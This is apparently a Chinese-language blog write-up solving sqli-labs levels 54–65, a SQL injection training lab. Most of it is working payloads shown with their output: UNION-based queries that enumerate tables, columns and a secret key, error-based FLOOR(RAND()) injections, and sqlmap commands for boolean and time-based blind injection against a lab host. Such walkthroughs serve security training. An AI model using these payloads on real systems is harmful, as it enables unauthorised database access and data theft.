sqlilab-Less-54-65-writeup

Less-54 GET请求联合查询10步拿key 单引号

进行联合查询注入的时候需要注意,前期判断是否成功闭合,判断字段数,都是要确保后台数据库存在字段id的编号,这里测试可以写ID=1,2,3 写其他数字看不到效果,然后开始查表名等其他后续操作就可以写个不存在的id编号即可

判断闭合方式是否成功
?id=1'--+

判断字段数
?id=1' order by 3--+
?id=1' order by 4--+

确认可以注入的字段
?id=-1' union select 1,2,3 --+
根据显示的结果是可以通过2和3查看

查表名
http://106.54.35.126/Less-54/?id=-1%27%20union%20select%201,2,%28SELECT+GROUP_CONCAT%28table_name+SEPARATOR+0x3c62723e%29+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE%28%29%29%20--+

显示结果:
Your Login name:2
Your Password:BROZHOX7ME

查字段名
http://106.54.35.126/Less-54/?id=-1%27%20union%20select%201,2,%28SELECT+GROUP_CONCAT%28column_name+SEPARATOR+0x3c62723e%29+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x42524f5a484f58374d45%29--+

BROZHOX7ME ---> 16进制42524f5a484f58374d45 在线转换:https://www.bejson.com/convert/ox2str/

显示结果:
Your Login name:2
Your Password:id
sessid
secret_FDK5
tryy

查询字段值
http://106.54.35.126/Less-54/?id=-1%27%20union%20select%201,2,%28SELECT+GROUP_CONCAT%28secret_FDK5%29+FROM+BROZHOX7ME%29--+

显示结果:
Your Login name:2
Your Password:oNf3esAKnoNVUbViCYCbGPzv

Less-55 GET请求联合查询14步拿key 小括号

跟Less-54一样的payload,拼合方式由单引号改成了小括号

判断闭合方式是否成功
?id=1)--+

http://106.54.35.126/Less-55/
?id=-1) union%20select%201,2,%28SELECT+GROUP_CONCAT%28table_name+SEPARATOR+0x3c62723e%29+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE%28%29%29%20--+

其他操作跟Less-54一样


Less-56 GET请求联合查询14步拿key 单引号 小括号

判断闭合方式是否成功
?id=1')--+

http://106.54.35.126/Less-56/?id=-1%27%29%20union%20select%201,2,%28SELECT+GROUP_CONCAT%28table_name+SEPARATOR+0x3c62723e%29+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE%28%29%29%20--+

其他操作跟Less-54一样


Less-57 GET请求联合查询14步拿key 双引号

判断闭合方式是否成功
?id=1"--+

http://106.54.35.126/Less-57/?id=-1%22%20union%20select%201,2,%28SELECT+GROUP_CONCAT%28table_name+SEPARATOR+0x3c62723e%29+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE%28%29%29%20--+


Less-58 GET请求5步拿key 单引号

此关卡不能使用联合查询,因为用户输出的数组且被逆序了,所以使用报错注入效果显著

http://106.54.35.126/Less-58/?id=1%27+AND+%28SELECT+1+FROM+%28SELECT+COUNT%28*%29,CONCAT%28%28SELECT%28SELECT+CONCAT%28CAST%28CONCAT%28secret_FDK5%20%29+AS+CHAR%29,0x7e%29%29+FROM+BROZHOX7ME+LIMIT+0,1%29,FLOOR%28RAND%280%29*2%29%29x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x%29a%29--+

Less-59 GET请求5步拿key

跟Less-58一样,拼合方式是整型,不加单引号

http://106.54.35.126/Less-59/?id=1+AND+%28SELECT+1+FROM+%28SELECT+COUNT%28*%29,CONCAT%28%28SELECT%28SELECT+CONCAT%28CAST%28CONCAT%28secret_FDK5%20%29+AS+CHAR%29,0x7e%29%29+FROM+BROZHOX7ME+LIMIT+0,1%29,FLOOR%28RAND%280%29*2%29%29x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x%29a%29--+

Less-60 GET请求5步拿key

跟Less-58一样,拼合方式是双引号和小括号

http://106.54.35.126/Less-60/?id=1%22%29+AND+%28SELECT+1+FROM+%28SELECT+COUNT%28*%29,CONCAT%28%28SELECT%28SELECT+CONCAT%28CAST%28CONCAT%28secret_FDK5%20%29+AS+CHAR%29,0x7e%29%29+FROM+BROZHOX7ME+LIMIT+0,1%29,FLOOR%28RAND%280%29*2%29%29x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x%29a%29--+

Less-61 GET请求5步拿key

跟Less-58一样,拼合方式是单引号和双小括号

http://106.54.35.126/Less-61/?id=1%27%29%29+AND+%28SELECT+1+FROM+%28SELECT+COUNT%28*%29,CONCAT%28%28SELECT%28SELECT+CONCAT%28CAST%28CONCAT%28secret_FDK5%20%29+AS+CHAR%29,0x7e%29%29+FROM+BROZHOX7ME+LIMIT+0,1%29,FLOOR%28RAND%280%29*2%29%29x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x%29a%29--+

Less-62 GET请求5步拿key

跟Less-58一样,但是把显错取消, 所以这里只能布尔型盲注和时间延时盲注,拼合方式是单引号和一个小括号

使用sqlmap进行布尔型盲注

python sqlmap.py -u http://106.54.35.126/Less-62/?id=1 --dbms=MySQL --random-agent --flush-session --technique=B -v 3 --level=3 --risk=3 --dbs --batch

python sqlmap.py -u http://106.54.35.126/Less-62/?id=1 --dbms=MySQL --random-agent --flush-session --technique=T -v 3 --level=3 --risk=3 --dbs --batch

Less-63 GET请求5步拿key

跟Less-58一样,但是把显错取消, 所以这里只能布尔型盲注和时间延时盲注,拼合方式是单引号

使用sqlmap进行布尔型盲注

python sqlmap.py -u http://106.54.35.126/Less-63/?id=1 --dbms=MySQL --random-agent --flush-session --technique=B -v 3 --level=3 --risk=3 --dbs --batch

Less-64 GET请求5步拿key

跟Less-58一样,但是把显错取消, 所以这里只能布尔型盲注和时间延时盲注,拼合方式是双小括号

使用sqlmap进行布尔型盲注

python sqlmap.py -u http://106.54.35.126/Less-64/?id=1 --dbms=MySQL --random-agent --flush-session --technique=B -v 3 --level=3 --risk=3 --dbs --batch

Less-65 GET请求5步拿key

跟Less-58一样,但是把显错取消, 所以这里只能布尔型盲注和时间延时盲注,拼合方式是单引号和小括号

使用sqlmap进行布尔型盲注

python sqlmap.py -u http://106.54.35.126/Less-65/?id=1 --dbms=MySQL --random-agent --flush-session --technique=B -v 3 --level=3 --risk=3 --dbs --batch

上一篇:go利用gin框架提供接口


下一篇:从零开发区块链应用(四)--自定义业务错误信息